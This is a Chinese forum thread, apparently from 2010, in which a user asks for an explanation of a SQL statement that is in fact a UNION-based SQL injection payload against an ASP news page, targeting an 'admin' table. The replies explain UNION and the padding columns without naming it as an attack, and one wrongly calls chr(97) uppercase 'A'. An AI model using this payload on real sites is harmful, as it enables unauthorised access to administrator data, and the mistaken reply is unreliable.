34,587
社区成员
发帖
与我相关
我的任务
分享麻烦各位帮我解释一下这个sql语句。
/news.asp?news_id=3
and 1=2 union all select
chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97),1,1,1,1
from admin where 1=1 and 1=1
这个语句是联合语句。。。对吧?
但是为什么使用那么多+,然后还有逗号。是怎么解释的呢?不懂了。晕死。
and 1=2 union all select
chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97),1,1,1,1
from admin where 1=1 and 1=1
这个语句是联合语句。。。对吧?
但是为什么使用那么多+,然后还有逗号。是怎么解释的呢?不懂了。晕死。
...全文
请发表友善的回复…
发表回复
abuying 2010-12-08
- 打赏
- 举报
chr(97) 为大写的A
不知道写这么多A有啥用
不知道写这么多A有啥用
and 1=2 union all select --1=2为否,关系为and,所以前面执行不了,
--使用union all 把结果集串联,合并起来,这里前面结是集为空,所以是后面的结果集了
chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97)+chr(97),1,1,1,1 --1,为列值
from admin where 1=1 and 1=1 --条件 可能
dawugui 2010-12-07
- 打赏
- 举报
union all
联合查询.
chr,不知道什么东东,
1,1,1,1 这些应该是匹配字段用的.
联合查询.
chr,不知道什么东东,
1,1,1,1 这些应该是匹配字段用的.
xwrcc 2010-12-07
- 打赏
- 举报
自己顶一下先。呵呵。麻烦各位啦。
kadboy 2010-12-07
- 打赏
- 举报
where 1=1 and 1=1
估计原来为变量,例如'where '+@a+'=1 and '+@b+'=1' 正好这次查询 @a='1' @b='1'
估计原来为变量,例如'where '+@a+'=1 and '+@b+'=1' 正好这次查询 @a='1' @b='1'
